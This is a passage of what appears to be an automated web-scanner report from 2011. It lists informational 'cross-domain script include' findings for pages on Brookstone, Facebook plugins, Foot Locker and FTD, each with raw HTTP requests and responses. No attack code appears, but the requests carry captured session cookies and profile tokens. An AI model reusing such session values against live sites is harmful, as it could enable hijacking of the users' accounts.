Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a; s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512915786%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=10800
Expires: Mon, 16 May 2011 04:58:40 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:40 GMT
Content-Length: 118287


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

18.28. http://www.brookstone.com/shoppingCart.jsp.vr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.brookstone.com
Path:   /shoppingCart.jsp.vr

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shoppingCart.jsp.vr HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html?bkiid=subCategoryLandingPage_home_beanbag_chairs_kids|C1TopProducts1FDT|11370241
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543306797%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:35:57 GMT
Set-Cookie: TS657dfa=02ff95a5e2b4b81f69fff5bd65984d7ce754034066e5db8e4dd0fe0d60ac0ec56e0e0800; Path=/
Content-Length: 82708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_cart.js"></script>
...[SNIP]...

18.29. https://www.brookstone.com/formhandlerservlet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.brookstone.com
Path:   /formhandlerservlet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, pre-check=0, post-check=0, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:05 GMT
Set-Cookie: TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/
Content-Length: 92549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<!-- Generated by
...[SNIP]...
<div class="veriSign_container">
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.brookstone.com&size=S&use_flash=NO&use_transparent=NO&lang=en"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="https://cts-secure.channelintelligence.com/1272812728_landing.js"></script>
...[SNIP]...

18.30. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:22 GMT
Content-Length: 6352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

18.31. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Mon, 16 May 2011 01:59:12 GMT
Content-Length: 9048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...

18.32. http://www.footlocker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLC=web%2D23; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; NST=2011%2D05%2D15%2020%3A43%3A37; TID=5555%2D37151120432137200525561%2D0; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; cmTPSet=Y; CHOSEN_BANNER_ID=FS/$75; fcspersistslider_click_1=1; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:56 GMT
Connection: close
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kvNzcq7EhhaxwicsoNK5tEHcjE3%0AYFDrCAOfSiDaoXvuilQ%2FxCMBrPOPNx8buPyL9lx0NzqsjNz0q4kL6gSipJbM8SiVTyaUlrgEsJFe%0AR0Pt4%2BMEOSoTJQWYIpa4nKSm4viwlCWT1JV2V7KDGygnmWiNg1zAOCJfoc2GfIzeW5%2FeSK5uXUOS%0AKuE8UK42iD0wQl31wi0YADO2S9yjp8izb9ei;expires=Wed, 08-May-2041 01:58:56 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 01:58:56 GMT;path=/
Content-Length: 107727


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Sneakers - Athletic Sho
...[SNIP]...
</script>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<!-- requestProtocol: http -->

   <script type="text/javascript" src="http://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="http://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

18.33. https://www.footlocker.com/account/default.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/default.cfm?action=accountCreate HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0; NewRegistrant=Global Header Log In|Create an Account

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:38 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D22;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:38 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:38 GMT;path=/
Content-Length: 159425


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker New Account
...[SNIP]...
<!-- requestProtocol: https -->

   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

18.34. https://www.footlocker.com/account/default/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.footlocker.com
Path:   /account/default/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/default/ HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305541986623&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D06; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:36:41 GMT
Connection: keep-alive
Set-Cookie: SSLC=web%2D14;domain=.footlocker.com;path=/
Set-Cookie: USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib;expires=Wed, 08-May-2041 10:36:41 GMT;path=/
Set-Cookie: BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib;path=/
Set-Cookie: TID=5555%2D37151120432137200525561%2D0;expires=Sun, 14-Aug-2011 10:36:41 GMT;path=/
Content-Length: 78368


<!-- -->
<HTML xmlns:fb="http://www.facebook.com/2008/fbml">
<HEAD>
   <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script>
   

<title>Foot Locker Account Sig
...[SNIP]...
<!-- requestProtocol: https -->

   <script type="text/javascript" src="https://t.p.mybuys.com/js/mybuys3.js"></script>
   <script type="text/javascript" src="https://t.p.mybuys.com/clients/FOOTLOCKER/js/setup.js"></script>
...[SNIP]...
</div>

<script language="javascript1.1" src="//libs.coremetrics.com/eluminate.js" type="text/javascript"></script>
...[SNIP]...
<div class="footer-icons-slot margin-mod"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.footlocker.com&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...

18.35. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; markcode=528; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; s_cc=true; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; s_sq=%5B%5BB%5D%5D; last_active=1305510017604; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; fsr.a=1305510799352

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 16 May 2011 01:53:22 GMT
X-Varnish: 767403341 767403290
Age: 1
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 136387


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
    <script type="text/javascript" src="http://www.ftdimg.com/v20110407/js/compressed-jcarousel.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- MyBuys setup files -->
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.36. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /sweet-shop-ctg/product-sweet-shop/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sweet-shop-ctg/product-sweet-shop/ HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
